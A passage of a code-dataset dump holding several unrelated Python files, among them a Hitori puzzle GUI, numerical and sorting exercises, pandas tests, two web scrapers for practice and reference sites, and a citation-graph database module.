1\r\n\t\treturn finitoNeriC\r\n\r\n\t#metodo che controlla se c'è una cella chiusa da celle nere\r\n\tdef cellaBiancaChiusa(self):\r\n\t\tmatriceVal = self.getMatriceGui()\r\n\t\tmatrice2 = 
self.getMatrice()\r\n\r\n\t\tcelleBiancheChiuse = 0\r\n\r\n\t\ttry:\r\n\t\t\tfor x in range(self.rows()):\r\n\t\t\t\tfor y in range(self.cols()):\r\n\t\t\t\t\tif x == 0:\r\n\t\t\t\t\t\tif y == 0:\r\n\t\t\t\t\t\t\tif (matrice2[x + 1][y] == BLACK and matrice2[x][y + 1] == BLACK):\r\n\t\t\t\t\t\t\t\tcelleBiancheChiuse += 1\r\n\t\t\t\t\t\telif y == self.cols()-1:\r\n\t\t\t\t\t\t\tif (matrice2[x + 1][y] == BLACK and matrice2[x][y - 1] == BLACK):\r\n\t\t\t\t\t\t\t\tcelleBiancheChiuse += 1\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tif (matrice2[x + 1][y] == BLACK and matrice2[x][y - 1] == BLACK and matrice2[x][\r\n\t\t\t\t\t\t\t\ty + 1] == BLACK):\r\n\t\t\t\t\t\t\t\tcelleBiancheChiuse += 1\r\n\r\n\t\t\t\t\telif x == self.cols()-1:\r\n\t\t\t\t\t\tif y == 0:\r\n\t\t\t\t\t\t\tif (matrice2[x - 1][y] == BLACK and matrice2[x][y + 1] == BLACK):\r\n\t\t\t\t\t\t\t\tcelleBiancheChiuse += 1\r\n\t\t\t\t\t\telif y == self.cols()-1:\r\n\t\t\t\t\t\t\tif (matrice2[x - 1][y] == BLACK and matrice2[x][y - 1] == BLACK):\r\n\t\t\t\t\t\t\t\tcelleBiancheChiuse += 1\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tif (matrice2[x - 1][y] == BLACK and matrice2[x][y + 1] == BLACK and matrice2[x][\r\n\t\t\t\t\t\t\t\ty - 1] == BLACK):\r\n\t\t\t\t\t\t\t\tcelleBiancheChiuse += 1\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tif y == 0:\r\n\t\t\t\t\t\t\tif (matrice2[x + 1][y] == BLACK and matrice2[x - 1][y] == BLACK and matrice2[x][\r\n\t\t\t\t\t\t\t\ty + 1] == BLACK):\r\n\t\t\t\t\t\t\t\tcelleBiancheChiuse += 1\r\n\t\t\t\t\t\telif y == self.cols()-1:\r\n\t\t\t\t\t\t\tif (matrice2[x + 1][y] == BLACK and matrice2[x - 1][y] == BLACK and matrice2[x][\r\n\t\t\t\t\t\t\t\ty - 1] == BLACK):\r\n\t\t\t\t\t\t\t\tcelleBiancheChiuse += 1\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tif (matrice2[x + 1][y] == BLACK and matrice2[x - 1][y] == BLACK and matrice2[x][\r\n\t\t\t\t\t\t\t\ty + 1] == BLACK and matrice2[x][y - 1] == BLACK):\r\n\t\t\t\t\t\t\t\tcelleBiancheChiuse += 1\r\n\t\texcept:\r\n\t\t\tpass\r\n\r\n\t\treturn celleBiancheChiuse\r\n\r\n\t#metodo che controlla mossa per i suggerimenti : NON funzionante\r\n\tdef wrong(self) -> bool:\r\n\r\n\t\tif (self.controlloCelleNereRighe() == 0\r\n\t\t\t\tand self.controlloCelleNereColonne() == 0 and self.cellaBiancaChiusa() == 0):\r\n\t\t\treturn False\r\n\t\telse :\r\n\t\t\treturn True\r\n\r\n\t#Suggerimenti : NON funzionante\r\n\tdef suggerimenti(self):\r\n\t\tmatriceVal = self.getMatriceGui()\r\n\t\tmatrice2 = self.getMatrice()\r\n\r\n\t\tfor y in range(self.rows()):\r\n\t\t\tfor x in range(self.cols()):\r\n\t\t\t\tsupp = matrice2[y][x]\r\n\t\t\t\tmatrice2[y][x] = BLACK\r\n\t\t\t\tself.setMatrice(matrice2)\r\n\t\t\t\tif self.wrong() :\r\n\t\t\t\t\tmatrice2[y][x] = 0\r\n\t\t\t\t\tself.setMatrice(matrice2)\r\n\t\t\t\t\tself.flag_at(x,y)\r\n\t\t\t\telse :\r\n\t\t\t\t\tmatrice2[y][x] = 0\r\n\t\t\t\t\tself.setMatrice(matrice2)\r\n\t\t\t\t\tself.play_at(x,y,0)\r\n\r\n\t#Automatismi: metodo per annerire in automatico in base alla celle cerchiate\r\n\tdef annerireAuto(self,x1: int, y1: int):\r\n\t\tmatrice = self.getMatriceGui()\r\n\t\tmatriceVal = self.getMatrice()\r\n\r\n\t\tfor y in range (self.rows()) :\r\n\t\t\tif matrice[x1][y] == matrice[x1][y1] and y != y1:\r\n\t\t\t\tself.play_at(y,x1,1)\r\n\r\n\t\tfor x in range (self.cols()) :\r\n\t\t\tif matrice[x][y1] == matrice[x1][y1] and x != x1:\r\n\t\t\t\tself.play_at(y1,x,1)\r\n\r\n\t#metodo per annerire una cella\r\n\tdef play_at(self, x: int, y: int, val: int):\r\n\t\tmatriceVal = self.getMatrice()\r\n\t\tmatrice = self.getMatriceGui()\r\n\t\tmatOriginale = 
self.getMatriceOriginale()\r\n\r\n\t\tmatOriginale[y][x] = matrice[y][x] #salva il valore numerico che c'era prima che la cella fosse annerita\r\n\t\tmatriceVal[y][x] = BLACK\r\n\r\n\t\t#se attivato l'automatismo cerchia le celle automaticamente\r\n\t\tauto = self.getValAutomatismi()\r\n\t\tif auto == 1 and val == 0:\r\n\t\t\tif x == 0:\r\n\t\t\t\tif y == 0:\r\n\t\t\t\t\tself.flag_at(x, y + 1)\r\n\t\t\t\t\tself.flag_at(x + 1, y)\r\n\t\t\t\telif y == self.cols()-1:\r\n\t\t\t\t\tself.flag_at(x, y - 1)\r\n\t\t\t\t\tself.flag_at(x + 1, y)\r\n\t\t\t\telse:\r\n\t\t\t\t\tself.flag_at(x, y - 1)\r\n\t\t\t\t\tself.flag_at(x, y + 1)\r\n\t\t\t\t\tself.flag_at(x + 1, y)\r\n\t\t\telif x == self.cols()-1:\r\n\t\t\t\tif y == 0:\r\n\t\t\t\t\tself.flag_at(x, y + 1)\r\n\t\t\t\t\tself.flag_at(x - 1, y)\r\n\t\t\t\telif y == self.cols()-1:\r\n\t\t\t\t\tself.flag_at(x, y - 1)\r\n\t\t\t\t\tself.flag_at(x - 1, y)\r\n\t\t\t\telse:\r\n\t\t\t\t\tself.flag_at(x, y - 1)\r\n\t\t\t\t\tself.flag_at(x, y + 1)\r\n\t\t\t\t\tself.flag_at(x - 1, y)\r\n\t\t\telse:\r\n\t\t\t\tif y == 0:\r\n\t\t\t\t\tself.flag_at(x, y + 1)\r\n\t\t\t\t\tself.flag_at(x-1, y)\r\n\t\t\t\t\tself.flag_at(x + 1, y)\r\n\t\t\t\telif y == self.cols()-1:\r\n\t\t\t\t\tself.flag_at(x, y - 1)\r\n\t\t\t\t\tself.flag_at(x - 1, y)\r\n\t\t\t\t\tself.flag_at(x + 1, y)\r\n\t\t\t\telse:\r\n\t\t\t\t\tself.flag_at(x,y+1)\r\n\t\t\t\t\tself.flag_at(x, y - 1)\r\n\t\t\t\t\tself.flag_at(x+1, y )\r\n\t\t\t\t\tself.flag_at(x-1, y )\r\n\t\t\r\n\t\tself.setMatriceOriginale(matOriginale)\r\n\t\tself.setMatrice(matriceVal)\r\n\r\n\t#metodo per cerchiare una cella\r\n\tdef flag_at(self, x: int, y: int):\r\n\t\tmatrice = self.getMatriceGui()\r\n\t\tmatriceVal = self.getMatrice()\r\n\t\tmatOriginale = self.getMatriceOriginale()\r\n\r\n\t\tmatOriginale[y][x] = matrice[y][x] #salva il valore numerico che c'era prima che la cella fosse cerchiata\r\n\t\tmatriceVal[y][x] = CIRCLE\r\n\r\n\t\tself.setMatriceOriginale(matOriginale)\r\n\t\tself.setMatrice(matriceVal)\r\n\r\n\t\t#se attivato l'automatismo chiama il metodo annerireAuto()\r\n\t\tauto = self.getValAutomatismi()\r\n\t\tif auto == 1:\r\n\t\t\tself.annerireAuto(y,x)\r\n\r\n\t#metodo che serve per ritornare il valore numerico originale per una cella annerita o cerchiata\r\n\tdef returnOldValue(self, x: int, y: int) -> int:\r\n\t\tmatrice = self.getMatriceOriginale()\r\n\t\tmatrice2 = self.getMatrice()\r\n\r\n\t\tmatrice2[y][x] = matrice[y][x]\r\n\r\n\t\tself.setMatrice(matrice2)\r\n\r\n\t\treturn matrice[y][x]\r\n\r\n\t#metodo per ritornare il valore aggiornato di una cella\r\n\tdef value_at(self, x: int, y: int):\r\n\t\tmatriceVal = self.getMatrice()\r\n\t\tmatrice = self.getMatriceGui()\r\n\r\n\t\tif matriceVal[x][y] != BLACK and matriceVal[x][y] != CIRCLE :\r\n\t\t\treturn matrice[x][y]\r\n\t\telse :\r\n\t\t\treturn matriceVal[x][y]\r\n\r\n\tdef message(self, str) -> str:\r\n\t\treturn str\r\n\r\n\r\ndef main():\r\n\r\n\tgame = Hitori()\r\n\tgui_play(game)\r\n\r\nmain()","repo_name":"Gio947/Hitori","sub_path":"Hitori 2.4/Hitori/hitori_gui.py","file_name":"hitori_gui.py","file_ext":"py","file_size_in_byte":11743,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
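The boundary if/elif ladders in cellaBiancaChiusa and play_at above can collapse into one clipped-neighbor generator; a sketch, with `side` standing in for self.cols():

BLACK = -3

def neighbors(x, y, side):
    # Yield the orthogonal neighbours of (x, y) that fall inside the board.
    for dx, dy in ((1, 0), (-1, 0), (0, 1), (0, -1)):
        nx, ny = x + dx, y + dy
        if 0 <= nx < side and 0 <= ny < side:
            yield nx, ny

def celle_bianche_chiuse(matrice, side):
    # Count white cells whose in-board neighbours are all black.
    return sum(1 for x in range(side) for y in range(side)
               if matrice[x][y] != BLACK
               and all(matrice[a][b] == BLACK for a, b in neighbors(x, y, side)))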
+{"seq_id":"42001967231","text":"#!/usr/bin/python\nfrom math import pi,sqrt\n\n# Pi Day code to compute pi with the Simpson's rule\n\n# Integrand that corresponds to a change of variable on calculating the area of\n# a circle\ndef f(y):\n yy=y*y\n return 8*yy*sqrt(2-yy)\n\n# Composite Simpson rule\ndef simp(f,a,b,n):\n\n # Subinterval width\n h=(b-a)/float(n)\n\n # Simpson's formula\n fi=f(a)+f(b)\n for i in range(1,n):\n fi+=4*f(a+(i-0.5)*h)+2*f(a+i*h)\n fi+=4*f(b-0.5*h)\n\n # Return scaled answer\n return fi*h/6.0\n\n# Loop over a range of interval sizes and print absolute error\nj=1\nwhile j<=4096:\n\n # Compute Simpson's rule integral\n s=simp(f,0,1,j)\n\n # Print result and absolute error\n print(j,2/float(j),s,s-pi)\n j*=2\n","repo_name":"chr1shr/math514","sub_path":"calculus/pi_simpsons.py","file_name":"pi_simpsons.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"}
+{"seq_id":"8331826418","text":"from __future__ import annotations\n\nimport numpy as np\nimport pandas as pd\n\nfrom cvx.covariance.ewma import center, clip\n\n\ndef test_center_inactive():\n # Test case 1\n returns = pd.DataFrame({\"a\": [1, 2, 3], \"b\": [4, 5, 6]})\n halflife = 1\n min_periods = 0\n mean_adj = False\n expected_centered_returns = returns\n centered_returns, mean = center(returns, halflife, min_periods, mean_adj)\n pd.testing.assert_frame_equal(centered_returns, expected_centered_returns)\n pd.testing.assert_frame_equal(mean, 0.0 * returns)\n\n\ndef test_center_active():\n # Test case 2\n returns = pd.DataFrame({\"a\": [1, 2, 3], \"b\": [4, 5, 6]})\n halflife = 1\n min_periods = 0\n mean_adj = True\n expected_mean = pd.DataFrame(\n {\"a\": [1.0, 1.666667, 2.428571], \"b\": [4.0, 4.666667, 5.4285715]}\n )\n expected_centered_returns = returns.sub(expected_mean)\n\n centered_returns, mean = center(returns, halflife, min_periods, mean_adj)\n pd.testing.assert_frame_equal(centered_returns, expected_centered_returns)\n pd.testing.assert_frame_equal(mean, expected_mean)\n\n\ndef test_clip_1():\n # Test case 1\n data = pd.DataFrame({\"a\": [1, 2, 3, -4], \"b\": [4, -5, 6, 7]})\n clip_at = 5\n expected_data = pd.DataFrame({\"a\": [1, 2, 3, -4], \"b\": [4, -5, 5, 5]})\n clipped_data = clip(data, clip_at)\n assert clipped_data.equals(expected_data)\n\n\ndef test_clip_2():\n # Test case 2\n data = pd.DataFrame(np.random.randn(10, 5), columns=[\"a\", \"b\", \"c\", \"d\", \"e\"])\n clip_at = None\n expected_data = data\n clipped_data = clip(data, clip_at)\n assert clipped_data.equals(expected_data)\n","repo_name":"cvxgrp/cov_pred_finance","sub_path":"tests/test_ewma.py","file_name":"test_ewma.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"3"}
+{"seq_id":"948976083","text":"# File: Modulo.py\r\n\r\n# Description: Determines if a list of integers is closed under modulo (x % y is also a member # of the list for any nonzero x and y in the list)\r\n\r\n# Student Name:\r\n\r\n# Student UT EID:\r\n\r\n# Course Name: CS 313E\r\n\r\n# Unique Number: \r\n\r\nimport sys\r\n\r\n# Input: lst is a list of positive integers that includes 0\r\n# Output: return True if for any 2 nonzero elements x and y in the list, x % y is also in the list\r\n# return False otherwise\r\n\r\ndef is_closed_modulo(lst):\r\n \r\n for i in lst:\r\n if i != 0:\r\n #cop1 = lst.copy()\r\n #cop1.remove(i)\r\n for j in lst:\r\n if j != 0:\r\n key = i%j\r\n cop = lst.copy()\r\n cop.remove(i)\r\n if (key in lst) == False:\r\n return False\r\n return True\r\n\r\n\r\ndef main(): \r\n # read input file\r\n lst = [int(x) for x in sys.stdin.readline().strip().split(\" \")]\r\n\r\n # get result from your call to is_closed_modulo()\r\n result = is_closed_modulo(lst)\r\n\r\n # print the result to standard output\r\n print(result)\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"sathulkiran/CS313E-A0","sub_path":"Test1/Modulo.py","file_name":"Modulo.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"29936572262","text":"# решение с сайта moba 25\ndef partition(competitors, left, right):\n pivot = (competitors[left])\n i = left + 1\n j = right - 1\n while True:\n if (i <= j and competitors[j] > pivot):\n j -= 1\n elif (i <= j and competitors[i] < pivot):\n i += 1\n elif (competitors[j] > pivot) or (competitors[i] < pivot):\n continue\n if i <= j:\n competitors[i], competitors[j] = competitors[j], competitors[i]\n else:\n competitors[left], competitors[j] = competitors[j], competitors[left]\n return j\ndef quick_sort(competitors, left, right):\n if ((right - left) > 1):\n p = partition(competitors, left, right)\n quick_sort(competitors, left, p)\n quick_sort(competitors, p + 1, right)\ndef transformation(competitors):\n competitors[1] = - int(competitors[1])\n competitors[2] = int(competitors[2])\n return [competitors[1], competitors[2], competitors[0]]\n\nif __name__ == '__main__':\n number = int(input())\n competitors = [transformation(input().split()) for _ in range(number)]\n left = 0\n quick_sort(competitors, left, len(competitors))\n print(*(list(zip(*competitors))[2]), sep=\"\\n\")\n","repo_name":"gusevskiy/algorithms","sub_path":"algorithms_practikum/13_sprint/final_13/very_quik_sort_2.py","file_name":"very_quik_sort_2.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"70038918161","text":"class ComponentItem(object):\n\n # constructor\n # \\param node DOM node of item\n # \\param parent patent instance\n def __init__(self, node, parent=None):\n # DOM node\n self.node = node\n # list with child items\n self.__childItems = []\n # the parent ComponentItem of the item\n self.parent = parent\n\n # provides indexs of given child\n # \\param child\n # \\returns child index\n def index(self, child):\n return self.__childItems.index(child)\n\n # provides a number of the current item\n # \\returns a number of the current item\n def childNumber(self):\n if self.parent:\n return self.parent.index(self)\n return 0\n\n # provides the child item for the given list index\n # \\param i child index\n # \\returns requested child Item\n def child(self, i):\n size = len(self.__childItems)\n if i in range(size):\n return self.__childItems[i]\n if i >= 0 and i < self.node.childNodes().count():\n for j in range(size, i + 1):\n childNode = self.node.childNodes().item(j)\n childItem = ComponentItem(childNode, self)\n self.__childItems.append(childItem)\n return childItem\n\n # removes the given children from the child item list\n # \\param position list index of the first child to remove\n # \\param count number of children to remove\n # \\returns if indices not out of range\n def removeChildren(self, position, count):\n if position < 0 or position + count > self.node.childNodes().count():\n return False\n\n for _ in range(count):\n if position < len(self.__childItems):\n self.__childItems.pop(position)\n\n return True\n\n # inserts the given children into the child item list\n # \\param position list index of the first child to remove\n # \\param count number of children to remove\n # \\returns if indices not out of range\n def insertChildren(self, position, count):\n\n if position < 0 or position > self.node.childNodes().count():\n return False\n\n for i in range(position, position + count):\n if position <= len(self.__childItems):\n childNode = self.node.childNodes().item(i)\n childItem = ComponentItem(childNode, self)\n self.__childItems.insert(i, childItem)\n\n return True\n\n\nif __name__ == \"__main__\":\n\n from PyQt5.QtXml import QDomNode\n\n # DOM node\n qdn = QDomNode()\n # instance of component item\n di = ComponentItem(qdn, None)\n di.child(0)\n","repo_name":"nexdatas/nxsdesigner","sub_path":"nxsconfigtool/ComponentItem.py","file_name":"ComponentItem.py","file_ext":"py","file_size_in_byte":2604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"540618011","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\n#Importing dependencies\nimport requests\nimport time\nimport datetime as dt\nimport csv\nimport re\nfrom bs4 import BeautifulSoup as BS\n\n\n# In[ ]:\n\n\n#Creating CSV that links collected from each store page will be added to\nheader = ['title','link', 'dateAccessed']\nwith open('ProductURL.csv', 'w', newline = '', encoding = 'UTF8') as b:\n writer = csv.writer(b)\n writer.writerow(header)\n \n#Creating CSV that information from each product will be added to\nproductHeader = ['title', 'genre', 'price', 'quantity', 'inStock', 'UPC', 'productType', 'dateAccessed']\nwith open('ProductInformation.csv', 'w', newline = '', encoding = 'UTF8') as a:\n writer = csv.writer(a)\n writer.writerow(productHeader)\n\n#Function for extracting product information\ndef productExtract(url):\n page = requests.get(url, headers = headers)\n soup = BS(page.content, 'html.parser')\n\n #Select the title\n title = soup.html.title.text\n title = title[:title.index('|')].strip()\n\n #Select the genre, which is only located in a breadcrumb list\n genre = soup.find('ul').text\n #Create list of breadcrumb items\n genre = genre.split('\\n')\n genre = list(filter(None, genre))[-2]\n\n #Selecting price\n price = soup.find(class_ = 'price_color').get_text()\n\n #Selecting quantity and availability (inStock)\n #Returns a statement ie: 'In stock (21) available'\n availability = soup.find(class_ = 'instock availability').text\n\n #Selecting quantity by filtering numeric values into a list\n quantity = re.findall(r'\\d+', availability)[0]\n\n #Using quantity to determine availability\n quantity = int(quantity)\n if quantity <= 0:\n inStock = 'no'\n else:\n inStock = 'yes'\n\n #Selecting UPC and product type\n UPC = soup.html.table.td.text\n productType = list(soup.find_all('td'))[1].text\n\n #Determine when data was accessed\n dateAccessed = dt.datetime.now().strftime(\"%Y-%m-%d %H:%M\")\n\n #Write results onto CSV with product information\n results = [title, genre, price, quantity, inStock, UPC, productType, dateAccessed]\n with open('ProductInformation.csv', 'a+', newline = '', encoding = 'UTF8') as a:\n writer = csv.writer(a)\n writer.writerow(results)\n \n#Function for collecting URL for every product in store page\ndef pageCollect(url2):\n page = requests.get(url2)\n soup = BS(page.content, 'html.parser')\n \n #Collect all containers containing product title and link\n bookContainers = soup.find_all(\"li\", {'class':'col-xs-6 col-sm-4 col-md-3 col-lg-3'})\n\n for container in bookContainers:\n #Select title\n containerTitle = container.find('a').find('img').get('alt')\n \n #Select link\n href = container.find('a').get('href')\n bookLink = 'https://books.toscrape.com/catalogue/' + href\n \n #Determine when data was accessed\n dateAccessed = dt.datetime.now().strftime(\"%Y-%m-%d %H:%M\")\n \n #Write results onto CSV with product links\n row = (containerTitle, bookLink, dateAccessed)\n with open('ProductURL.csv', 'a+', newline = '\\n', encoding = 'UTF8') as b:\n writer = csv.writer(b)\n writer.writerow(row)\n productExtract(bookLink)\n \n#Finds total number of product store pages\n#Returns string ie: 'Page 1 of x (x = number of pages)'\nURL1 = 'https://books.toscrape.com/catalogue/frankenstein_20/index.html'\npage = requests.get(URL1, headers = headers)\nsoup = BS(page.content, 'html.parser')\npageNum = soup.find(\"ul\", {\"class\": \"pager\"}).text.strip()\npageTotal = int(pageNum[pageNum.index('of') + 3 : pageNum.index('next')])\n\n#For 
moving between pages\n#GENERATES A NEW URL\nfor i in range(1, pageTotal + 1):\n print('Currently parsing through page ' + str(i) + '.')\n URL = 'https://books.toscrape.com/catalogue/page-' + str(i) + '.html'\n pageCollect(URL)\n\n","repo_name":"jerometanabe/WebDataCollection","sub_path":"Project Script.py","file_name":"Project Script.py","file_ext":"py","file_size_in_byte":3914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
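One hedged refinement for the crawler above: reuse a single HTTP session and pause between fetches so a multi-page crawl stays gentle on the server; the half-second delay is an arbitrary choice.

import time
import requests
from bs4 import BeautifulSoup as BS

session = requests.Session()

def fetch_soup(url, delay=0.5):
    time.sleep(delay)                      # crude rate limit between requests
    return BS(session.get(url).content, 'html.parser')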
+{"seq_id":"25009702598","text":"import scrapy\nfrom itemloaders import ItemLoader\n\nfrom ..items import PeriodicElementItem\nfrom scrapy_playwright.page import PageMethod\n\n\n# no longer necessary since the pipeline takes care of it (run: scrapy crawl periodic_elements -O elements.json)\n# run: scrapy crawl periodic_elements\n\nclass PeriodicElementsSpider(scrapy.Spider):\n name = \"periodic_elements\"\n allowed_domains = [\"nih.gov\"]\n\n # don't need: start_urls = [\"/\"] since we're just working with 1 url\n\n def start_requests(self):\n # override start_requests to use scrapy-playwright\n yield scrapy.Request('https://pubchem.ncbi.nlm.nih.gov/ptable/',\n meta=dict(\n playwright=True,\n playwright_page_methods=[\n PageMethod(\"wait_for_selector\", \"div.ptable\")\n ]\n ))\n\n # \"async\" since we're waiting for the \"div.ptable\" selector above\n async def parse(self, response):\n for element in response.css(\"div.ptable div.element\"):\n i = ItemLoader(item=PeriodicElementItem(), selector=element)\n\n # [] attribute selector\n i.add_css(\"symbol\", '[data-tooltip=\"Symbol\"]')\n i.add_css(\"name\", '[data-tooltip=\"Name\"]')\n i.add_css(\"atomic_number\", '[data-tooltip=\"Atomic Number\"]')\n i.add_css(\"atomic_mass\", '[data-tooltip*=\"Atomic Mass\"]')\n i.add_css(\"chemical_group\", '[data-tooltip=\"Chemical Group Block\"]')\n\n yield i.load_item()\n","repo_name":"dmitriygrushin/scrap-periodic-table-scrapy-playwright-no-api","sub_path":"elems/elems/spiders/periodic_elements.py","file_name":"periodic_elements.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"39654560327","text":"import os\nimport itertools\nimport time\n\nimport numpy as np\nimport pandas as pd\nimport networkx as nx\nfrom sqlalchemy import Column, Integer, String, Table, ForeignKey, create_engine\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import relationship, sessionmaker\n\nfrom repeci.RFS import RFS\nfrom repeci.config import *\n\n\n__author__ = \"Anton Tarasenko \"\n\n\nBase = declarative_base()\n\npapers2authors_table = Table('papers2authors', Base.metadata,\n Column('paper_id', Integer, ForeignKey('papers.id')),\n Column('author_id', Integer, ForeignKey('authors.id'))\n)\npapers2jel_table = Table('papers2jel', Base.metadata,\n Column('paper_id', Integer, ForeignKey('papers.id')),\n Column('jel_id', Integer, ForeignKey('jel.id'))\n)\nciting2cited_table = Table('citing2cited', Base.metadata,\n Column('citing', Integer, ForeignKey('papers.id'), primary_key=True),\n Column('cited', Integer, ForeignKey('papers.id'), primary_key=True)\n)\n\nclass Paper(Base):\n __tablename__ = \"papers\"\n\n id = Column(Integer, primary_key=True)\n title = Column(String)\n year = Column(Integer)\n handle = Column(String, unique=True)\n # meta = [\"1\", \"2\"] # handle.split(\":\")\n # provider = column_property(str(handle).split(\":\")[1])\n # series = column_property(meta[2])\n\n refs = relationship(\"Paper\",\n secondary=\"citing2cited\",\n primaryjoin=\"Paper.id==citing2cited.c.citing\",\n secondaryjoin=\"Paper.id==citing2cited.c.cited\",\n backref=\"cited_by\")\n authors = relationship(\"Author\",\n secondary=\"papers2authors\",\n backref=\"papers\")\n jel = relationship(\"JEL\",\n secondary=\"papers2jel\",\n backref=\"papers\")\n def __repr__(self):\n hsplit = self.handle.split(\":\")\n url = \"http://ideas.repec.org/p/%s/%s.html\" % (\"/\".join(hsplit[1:3]), \"\".join(hsplit[3:]))\n return '' % (self.id, url)\n\nclass Author(Base):\n __tablename__ = \"authors\"\n\n id = Column(Integer, primary_key=True)\n name = Column(String, unique=True)\n code = Column(String, unique=True)\n\n def __repr__(self):\n return \"\" % (self.id, self.name, self.code)\n\nclass JEL(Base):\n __tablename__ = \"jel\"\n\n id = Column(Integer, primary_key=True)\n name = Column(String)\n code = Column(String, unique=True)\n\n def __repr__(self):\n return \"\" % (self.id, self.name, self.code)\n\nclass DB():\n def __init__(self):\n engine = create_engine('sqlite:///' + REPECI_DB, echo=False)\n Base.metadata.create_all(engine)\n Session = sessionmaker(bind=engine)\n session = Session()\n self.s = session\n\n def pd(self):\n df = pd.DataFrame(self.s.\\\n query(Paper.title, Paper.year, Author.name, JEL.code).\\\n join(Paper.authors).\\\n join(Paper.jel).\\\n all(),\n columns=['title', 'year', 'author', 'jel'])\n print(\"Exported to DataFrame\")\n return df\n\n def ba_table(self):\n df = self.pd()\n tab = pd.DataFrame(columns=['k', 'i', 'j', 'B_ijk', 'A_ijk', 'C_ijk', 'N_ijk'])\n for k in set(df['title'].tolist()):\n year = df[df['title'] == k]['year'].tolist()[0]\n authors = set(df[df['title'] == k]['author'].tolist())\n for i, j in [itertools.permutations(authors, 2)]:\n B_ijk = set(df[df['title'] == k & df['year'] < year]['jel'].tolist())\n A_ijk = set(df[df['title'] == k & df['year'] > year]['jel'].tolist())\n C_ijk = B_ijk & A_ijk\n N_ijk = A_ijk - C_ijk\n\n for row in tab.iterrows():\n i, j = row[1]['i'], row[1]['j']\n ix = tab.i == i & tab.j == j\n tab[ix]['T_jik'] = tab[tab.j == i & tab.i == j]['B_ijk'] & tab['N_ijk']\n tab[ix]['r_jik'] = len(tab[ix]['T_jik']) / 
len(tab[ix]['A_ijk'])\n\n r_ji = tab['r_jik'].groupby(['i', 'j']).agg['mean']\n return r_ji\n\n def import_refs(self, file, n=0):\n lines = list()\n with open(file) as f:\n if n == 0:\n lines = f.read().splitlines()\n else:\n c = 0\n while c < n:\n lines.append(f.readline().strip())\n c += 1\n print(len(lines), \"lines read\")\n for line in lines:\n sep = line.split(sep=\" \")\n cited = sep[0]\n cited_instance = self.s.query(Paper).filter(Paper.handle == cited).first()\n if cited_instance is None:\n cited_instance = Paper(handle=cited)\n for citing in set(sep[1].split(sep=\"#\")):\n citing_instance = self.s.query(Paper).filter(Paper.handle == citing).first()\n if citing_instance is None:\n citing_instance = Paper(handle=citing)\n if citing_instance.handle != cited_instance.handle:\n cited_instance.cited_by.append(citing_instance)\n self.s.add(cited_instance)\n self.s.flush()\n self.s.commit()\n\n def ref_graph(self):\n s = time.perf_counter()\n s2 = time.perf_counter()\n # MultiDiGraph isn't supported by pagerank() and other algorithms\n G = nx.DiGraph()\n G.add_edges_from(self.s.query(citing2cited_table).all())\n '''\n for (citing, cited) in self.s.query(citing2cited_table).all():\n for i, (cited,) in enumerate(self.s.query(Paper.handle).all(), 1):\n for (citing,) in self.s.query(Paper.handle).filter(Paper.refs.any(Paper.handle == cited)).all():\n G.add_edge(cited, citing)\n if i % 100 == 0:\n e2 = time.perf_counter()\n print(\"%d cited papers processed in %d seconds\" % (i, round(e2 - s2, 1)))\n s2 = time.perf_counter()\n '''\n e = time.perf_counter()\n\n print(\"Graph building is completed in %d seconds\" % round(e - s, 1))\n return G\n\n def ref_metrics(self, G):\n '''\n See https://networkx.github.io/documentation/latest/reference/algorithms.html for algorithms.\n Some algorithms don't support directed graphs. 
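Degree centrality and PageRank accept directed graphs natively, while the\n        commented-out current-flow measures below require connected undirected graphs.\n        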
More comments on each algorithm in respect to directed graphs.\n Edges in graph G are directed from a to b in (a, b), where a cites b.\n :param G: graph\n :return: a dataframe of network statistics for each node.\n '''\n\n s = time.perf_counter()\n\n df = pd.DataFrame([ # Equals the number of references in a paper as (2, 1) is \"2\" citing \"1\"\n nx.out_degree_centrality(G),\n # Equals the number of citations\n nx.in_degree_centrality(G),\n # (1, 3) and (2, 3) give PageRank to \"3\"\n nx.pagerank(G),\n # (1, 2, 3) gives 0 to \"3\" as it can't reach any other nodes\n # Since \"if the graph is not completely connected, this algorithm computes the closeness\n # centrality for each connected part separately,\" ensure that all papers are connected\n nx.closeness_centrality(G),\n # (2, 3, 4) and (4, 3, 2) give higher betweenness to \"3\" than (2, 3, 4) alone does\n # nx.betweenness_centrality(G),\n # nx.current_flow_betweenness_centrality(G),\n # nx.current_flow_closeness_centrality(G),\n # nx.eigenvector_centrality(G)\n ]).T\n df.columns = ['odc', 'idc', 'pr', 'cc',\n # 'bc', 'cfbc', 'cfcc', 'ec'\n ]\n\n e = time.perf_counter()\n print(\"Metrics is computed in %d seconds\" % round(e - s, 1))\n return df\n\n def ref_pagerank_a(self, G):\n '''\n Check `nx.pagerank()` sensitivity for alpha.\n :param G: graph\n :return: pd.DataFrame of comparative statistics\n '''\n df = pd.DataFrame()\n for a in np.arange(.5, 1, .05):\n nxpr = nx.pagerank(G, alpha=a)\n df = df.join(pd.DataFrame(list(nxpr.values()),\n columns=[str(a)],\n index=nxpr.keys()),\n how='outer')\n return df\n\n def import_rdf(self, file):\n with open(file, 'r', encoding='latin-1') as f:\n lines = f.readlines()\n paper = Paper()\n is_article = False\n for line in lines:\n br = line.find(':')\n k = line[:br]\n v = 